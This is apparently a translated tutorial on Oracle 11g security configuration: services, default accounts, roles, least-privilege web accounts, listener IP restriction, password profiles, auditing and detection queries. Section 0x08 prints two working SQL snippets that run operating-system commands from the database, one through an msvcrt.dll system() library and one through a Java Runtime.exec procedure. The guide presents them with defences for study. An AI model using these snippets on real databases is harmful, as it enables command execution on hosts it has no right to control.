A tutorial on summarizing Oracle Database Security Configuration Guidelines

Source: Internet
Author: User

0x01 Test Environment

Operating system: Windows Server 2008 x64; Oracle: 11.2.0.1.0

0x02 Oracle Permissions Introduction

An Oracle instance corresponds to one database: creating a new database creates a new instance, and each instance runs as its own independent process.

Each user corresponds to a schema. When a user creates a data object (such as a table) in that schema, the owner can access it directly by name, while other users must reference it as schema_name.object_name.

By default a user holds privileges only on the data objects in their own schema, and no other user holds privileges on them. SYS and SYSTEM hold privileges on every schema by default.

When a user logs on to an Oracle instance, Oracle first checks whether the user has the right to log on: without it the login fails, with it the login succeeds. After login, every operation the user attempts is checked against the user's privileges: with the privilege the operation succeeds, without it the operation fails.

Oracle has two core processes: the Oracle service process and the listener process. An external connection first reaches the listener, which routes it to the Oracle instance process for the database instance the client asked for.

0x03 Oracle System Services

Oracle 11g installed on Windows Server 2008 has seven services in total:

A. Oracle ORCL VSS Writer Service:

Oracle Volume Shadow Copy writer service. VSS (Volume Shadow Copy Service) lets the storage infrastructure (disks, arrays, etc.) create a high-fidelity point-in-time image, the shadow copy, on one or several volumes without affecting system performance. (Not required.)

B. ORACLEDBCONSOLEORCL:

Oracle Database Console service; ORCL is the Oracle instance identifier, and the default instance is ORCL. This service must be running to use Enterprise Manager (OEM). (Not required.)

C. ORACLEJOBSCHEDULERORCL:

Oracle Job Scheduler (timer) service; ORCL is the Oracle instance identifier. (Not required.)

D. OracleMTSRecoveryService:

Server-side control. This service lets the database act as a resource manager for Microsoft Transaction Server (MTS), COM/COM+ objects and transactions in a distributed environment. (Not required.)

E. OracleOraDb11g_home1ClrAgent:

Part of the Oracle Database Extensions for .NET service. (Not required.)

F. OracleOraDb11g_home1TNSListener:

Listener service, needed only when the database must be reached remotely. (Not mandatory, but must be started for external access.)

G. ORACLESERVICEORCL:

Database service (database instance): the Oracle core service and the basis for starting the database; the Oracle database starts correctly only if this service is running. (Must start.)

So which services need to be started for development?

For starters, if you only use Oracle's own SQL*Plus, starting ORACLESERVICEORCL is enough; if you use a third-party tool such as PL/SQL Developer, the OracleOraDb11g_home1TNSListener service must also be started. ORACLEDBCONSOLEORCL must be running to use the web-based EM; the remaining services are rarely used.

0x04 Oracle Default Account

After Oracle 11g is installed there are many default system accounts; apart from four, all are locked, and unless you have a specific purpose do not unlock them. The four are:

SYS: when a database is created, the SYS user is created and granted the DBA role by default. The base tables and views of the data dictionary are stored in the schema named SYS, which is essential to the operation of the Oracle database. To keep the data dictionary intact, the tables in the SYS schema are maintained only by the system; no user or database administrator may modify them, and no user may create tables in the SYS schema.

SYSTEM: like SYS, created by default when the database is created and granted the DBA role. It is used to create tables and views that display management information, as well as the internal tables and views used by various Oracle database applications and tools.

DBSNMP: the user used by the Intelligent Agent, which monitors and manages database performance; if this user is stopped the agent cannot collect that data.

SYSMAN: the user used for EM (Enterprise Manager) administration; it can be deleted or locked if you do not use it.

The passwords of all four accounts are set at installation. Since DBSNMP and SYSMAN are normally not used, locking them is recommended.

0x05 Oracle Permissions and Roles

A. Authority

Oracle privileges are divided into system privileges and object privileges. A newly created user has no privileges and cannot perform any operation. To carry out a specific database operation the user must be granted the corresponding system privilege, and to access an object in another schema the user must be granted the object privilege.

A system privilege is the right to execute a particular type of SQL statement; it controls one database operation or a group of them. For example, a user with the CREATE TABLE privilege can create tables in their own schema, while a user with CREATE ANY TABLE can create tables in any schema. Oracle provides more than 100 system privileges.

Common system privileges:

CREATE SESSION          connect to the database
CREATE VIEW             create views
CREATE PROCEDURE        create procedures, functions and packages
CREATE CLUSTER          create clusters
CREATE TABLE            create tables
CREATE PUBLIC SYNONYM   create public synonyms
CREATE TRIGGER          create triggers

Common object privileges:

ALTER        modify the table structure
DELETE       delete rows
SELECT       query rows
INSERT       insert rows
UPDATE       update rows
INDEX        create an index on the table
REFERENCES   reference the table in a foreign key
EXECUTE      execute a procedure, function or package

Note: ALL can be used in place of SELECT, UPDATE, INSERT, ALTER, INDEX and DELETE.

B. Role

Oracle roles are divided into predefined system roles and custom roles. A custom role can be given whatever privileges are needed; among the system roles, the important three are:

DBA: holds all privileges, the highest in the system; only DBAs can create database structures.

RESOURCE: users with RESOURCE can create entities (such as tables) but cannot create database structures.

CONNECT: users with CONNECT can only log on; they cannot create entities or database structures.

For ordinary users: grant the CONNECT and RESOURCE roles.

For DBA administrative users: grant the CONNECT, RESOURCE and DBA roles.

0x06 How Oracle establishes a Web site to connect users

Programme I:

As SYSTEM, create a new user and grant it the CONNECT and RESOURCE roles.

Log on as the new user and create the tables the site needs.

As SYSTEM, revoke the CONNECT and RESOURCE roles from the new user.

As SYSTEM, grant the new user the CREATE SESSION privilege.

As SYSTEM, give the new user a quota on the USERS tablespace.

Programme II:

As SYSTEM, create the tables the web site needs.

As SYSTEM, create a new user.

As SYSTEM, grant the user the CREATE SESSION system privilege, then grant the object privileges on each table that the site requires.

As SYSTEM, give the new user a quota on the USERS tablespace.

The web site then accesses the tables as SYSTEM.table_name.
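Programme I carried out as a SQL*Plus script, with the queries that confirm the result; this is an added example, not part of the article. The account webuser, its password, the table web_orders and the 100M quota are assumed values, and the extra REVOKE UNLIMITED TABLESPACE covers a detail the steps above do not mention: on 11g, granting RESOURCE also grants UNLIMITED TABLESPACE, and revoking the role does not take it back.

```sql
-- Programme I as a SQL*Plus script (added example). Assumed names: webuser,
-- its password, the table web_orders; <system_password> is a placeholder.

-- Step 1: as SYSTEM, create the account and grant CONNECT and RESOURCE for now.
CONNECT system/<system_password>@ORCL
CREATE USER webuser IDENTIFIED BY "Ch4nge-Me-N0w!" DEFAULT TABLESPACE users;
GRANT CONNECT, RESOURCE TO webuser;

-- Step 2: as the new user, create the tables the site needs in its own schema.
CONNECT webuser/"Ch4nge-Me-N0w!"@ORCL
CREATE TABLE web_orders (
    id        NUMBER PRIMARY KEY,
    customer  VARCHAR2(100) NOT NULL,
    amount    NUMBER(10,2)  NOT NULL);

-- Steps 3 to 5: back as SYSTEM, strip the account to what the site needs.
CONNECT system/<system_password>@ORCL
REVOKE CONNECT, RESOURCE FROM webuser;
-- RESOURCE silently brought UNLIMITED TABLESPACE with it; revoke that too.
REVOKE UNLIMITED TABLESPACE FROM webuser;
GRANT CREATE SESSION TO webuser;          -- may log in, nothing more
ALTER USER webuser QUOTA 100M ON users;   -- bounded space on the USERS tablespace

-- Check: exactly CREATE SESSION, no roles, a finite quota.
SELECT privilege FROM dba_sys_privs WHERE grantee = 'WEBUSER';
SELECT granted_role FROM dba_role_privs WHERE grantee = 'WEBUSER';
SELECT tablespace_name, max_bytes FROM dba_ts_quotas WHERE username = 'WEBUSER';
```

The first query should return only CREATE SESSION and the second no rows; if UNLIMITED TABLESPACE still appears, the extra REVOKE was skipped.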

0x07 Oracle Security Configuration Scheme

1. Restrict access by IP

Method one:

Allow only specific source IPs to reach the listener port: in Windows Firewall on Windows, or with iptables on Linux.

Method two:

On Windows, the source IPs allowed to reach the listener port can also be restricted with IPSec.

Method three:

Have the Oracle listener itself enforce the allowed source IPs by adding the following lines to $ORACLE_HOME/network/admin/sqlnet.ora on the server (the listener reads this file when it starts, so restart it afterwards):

tcp.validnode_checking = yes

# IPs allowed to connect
tcp.invited_nodes = (ip1, ip2, ...)

# IPs refused
tcp.excluded_nodes = (ip1, ip2, ...)

2. Change the port: change the listener's port to reduce exposure to scanning.

3. Turn off unnecessary services: stopping services that are not needed reduces what is reachable from outside; only ORACLESERVICEORCL and OracleOraDb11g_home1TNSListener must stay running. In particular, starting ORACLEDBCONSOLEORCL enables the web version of EM on port 1158; stop this service if you do not need it.

4. Strong passwords: every user needs a strong password of more than 8 characters containing upper and lower case letters, digits and special characters.

5. Lock unneeded users: Oracle has 4 unlocked accounts by default; locking DBSNMP and SYSMAN is recommended.

6. Privileged account handling: restrict remote logins by the database super administrator. A. Set REMOTE_LOGIN_PASSWORDFILE=NONE in the SPFILE. B. Set SQLNET.AUTHENTICATION_SERVICES=NONE in sqlnet.ora to disable automatic (OS-authenticated) login to the SYSDBA role.

7. Enable logging: auditing can be enabled to log database activity, but it consumes resources, so decide according to the actual situation.
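Items 4 to 7 implemented as one SQL*Plus script run as SYS, with queries that confirm the result; this is an added example, not from the article. The function strong_pw_verify, the profile web_app_profile and the account webuser are assumed names; Oracle applies password rules only through a verify function attached to a profile, and such a function must be owned by SYS.

```sql
-- Added hardening script for items 4 to 7; run as SYS in SQL*Plus.
-- Assumed names (not from the article): strong_pw_verify, web_app_profile, webuser.

-- 4. Strong passwords: enforced by a SYS-owned verify function attached to a profile.
CREATE OR REPLACE FUNCTION strong_pw_verify (
    username     VARCHAR2,
    password     VARCHAR2,
    old_password VARCHAR2) RETURN BOOLEAN IS
BEGIN
    IF LENGTH(password) < 8 THEN
        RAISE_APPLICATION_ERROR(-20001, 'Password must be at least 8 characters');
    END IF;
    IF NOT REGEXP_LIKE(password, '[A-Z]', 'c') OR NOT REGEXP_LIKE(password, '[a-z]', 'c')
       OR NOT REGEXP_LIKE(password, '[0-9]') OR NOT REGEXP_LIKE(password, '[^A-Za-z0-9]') THEN
        RAISE_APPLICATION_ERROR(-20002, 'Password needs upper, lower, digit and special');
    END IF;
    IF UPPER(password) = UPPER(username) THEN
        RAISE_APPLICATION_ERROR(-20003, 'Password must not equal the user name');
    END IF;
    RETURN TRUE;
END;
/
-- Lock after 5 failed logins for one hour (1/24 day); expire passwords after 90 days.
CREATE PROFILE web_app_profile LIMIT
    PASSWORD_VERIFY_FUNCTION strong_pw_verify
    FAILED_LOGIN_ATTEMPTS    5
    PASSWORD_LOCK_TIME       1/24
    PASSWORD_LIFE_TIME       90;
ALTER USER webuser PROFILE web_app_profile;

-- 5. Lock the default accounts the article says are normally unused.
ALTER USER dbsnmp ACCOUNT LOCK;
ALTER USER sysman ACCOUNT LOCK;

-- 6A. No remote password-file (SYSDBA) logins; takes effect after a restart.
--     6B, SQLNET.AUTHENTICATION_SERVICES=NONE, is set in sqlnet.ora, not in SQL.
ALTER SYSTEM SET remote_login_passwordfile = NONE SCOPE = SPFILE;

-- 7. Audit logons, user management, privilege grants and library creation
--    (records land in SYS.AUD$ only while audit_trail is DB or DB,EXTENDED).
AUDIT SESSION;
AUDIT USER;
AUDIT SYSTEM GRANT;
AUDIT CREATE LIBRARY;

-- Check the result.
SELECT username, account_status, profile FROM dba_users
 WHERE username IN ('SYS', 'SYSTEM', 'DBSNMP', 'SYSMAN', 'WEBUSER');
SELECT audit_option, success, failure FROM dba_stmt_audit_opts;
```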

8. Minimise the privileges of the web site's database account, following the account setup procedures described above.

9. Run the database process under a low-privilege account: create a new OS user for it and grant that user write permission on the data directory; if the database does not run correctly afterwards, fall back to granting Full Control on the whole Oracle directory.

10. Restrict the database process account's permissions on disk: grant it no special permissions outside the database directory (ideally not even read), adjusting to the actual situation; the principle is that the database directory gets what normal operation needs and other directories get nothing.

0x08 Oracle Privilege Escalation and Defence Points

1. Privilege escalation through PL/SQL (external procedures)

-- Create a library pointing at the C runtime, map its system() entry point to a
-- PL/SQL procedure, then call it. Needs the CREATE LIBRARY privilege and extproc;
-- the library shows up in DBA_LIBRARIES and the call in the audit trail.
CREATE OR REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\bin\msvcrt.dll';
/
CREATE OR REPLACE PROCEDURE execmd (command IN CHAR) IS
    EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C;
/
EXEC execmd('net user > netaaa.txt');

2. Privilege escalation through Java

-- Load a Java class that wraps Runtime.exec, publish it as a PL/SQL procedure,
-- then call it. Needs the Java stored-procedure and file/runtime permissions
-- that only SYS or JAVASYSPRIV holders have; the source shows up in DBA_OBJECTS.
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JavaCmd" AS
import java.lang.*;
import java.io.*;
public class JavaCmd {
    public static void ExecCommand(String command) throws IOException {
        Runtime.getRuntime().exec(command);
    }
}
/
CREATE OR REPLACE PROCEDURE javacmdproc (p_command IN VARCHAR2) AS
    LANGUAGE JAVA NAME 'JavaCmd.ExecCommand(java.lang.String)';
/
EXEC javacmdproc('cmd.exe /c net user > netaaa.txt');

Both methods succeed only when run as SYS; a user with ordinary privileges cannot complete them. The root of the defence is therefore the management of the SYS privileged account, but should that account be captured by hackers, running the database process as a low-privilege OS account and restricting that account's disk permissions limits what the hacker can do to the minimum. Escalating a low-privilege Oracle account to DBA and then to operating-system privileges is not covered in this article; better approaches from experts are welcome.
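Queries a defender can run to find the two paths above, whether for a baseline review or after a suspected compromise; this is an added example, not from the article. Only standard data-dictionary views are used; the list of Oracle-owned schemas excluded from the results is an assumption to adjust per database.

```sql
-- Added detection queries for the two escalation paths shown above; run as a DBA.
-- Standard data-dictionary views only; the excluded built-in schemas are an
-- assumed list and should match the database's own installed components.

-- 1. Who holds the privileges needed to create a library or a Java/PL-SQL
--    procedure at all? These grants, plus DBA, are the real attack surface.
SELECT grantee, privilege AS granted
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE LIBRARY', 'CREATE ANY LIBRARY',
                     'CREATE PROCEDURE', 'CREATE ANY PROCEDURE')
UNION ALL
SELECT grantee, granted_role
  FROM dba_role_privs
 WHERE granted_role IN ('DBA', 'JAVASYSPRIV', 'JAVA_ADMIN')
 ORDER BY 1, 2;

-- 2. Libraries bound to an OS file (msvcrt.dll, libc, ...): every row outside
--    Oracle's own schemas is a candidate system() bridge and needs a justification.
SELECT owner, library_name, file_spec, status
  FROM dba_libraries
 WHERE file_spec IS NOT NULL
   AND owner NOT IN ('SYS', 'SYSTEM', 'ORDSYS', 'MDSYS', 'CTXSYS', 'XDB');

-- 3. Procedures whose body is external C or Java: the CREATE text is kept in
--    DBA_SOURCE, so the EXTERNAL / LANGUAGE JAVA clauses can be searched.
SELECT DISTINCT owner, name, type
  FROM dba_source
 WHERE type IN ('PROCEDURE', 'FUNCTION', 'PACKAGE BODY')
   AND (UPPER(text) LIKE '%LANGUAGE C%' OR UPPER(text) LIKE '%LANGUAGE JAVA%')
   AND owner NOT IN ('SYS', 'SYSTEM', 'ORDSYS', 'MDSYS', 'CTXSYS', 'XDB');

-- 4. Java permissions that allow running OS commands or touching files;
--    Runtime.exec needs an execute FilePermission, normally held only by SYS.
SELECT grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE kind = 'GRANT'
   AND type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission')
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV');
```

Any unexpected row from queries 2 to 4 is worth correlating with the audit trail from item 7 above to see who created the object and when.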

0x09 Oracle Common Operations Commands

1. Connect to the database (mima stands for the password):

CONN sys/mima@ORCL AS SYSDBA;

2. Create a user (yonghuming stands for the user name, mima for the password):

CREATE USER yonghuming IDENTIFIED BY mima;

3. Grant privileges to the user:

GRANT CONNECT, RESOURCE TO yonghuming;
GRANT CREATE SESSION TO yonghuming;
ALTER USER yonghuming QUOTA UNLIMITED ON users;
GRANT UNLIMITED TABLESPACE TO yonghuming;
GRANT SELECT ON testable TO yonghuming;

4. Revoke privileges:

REVOKE CONNECT, RESOURCE FROM yonghuming;

5. Lock, unlock and delete an account:

ALTER USER yonghuming ACCOUNT LOCK;
ALTER USER yonghuming ACCOUNT UNLOCK;
DROP USER yonghuming CASCADE;
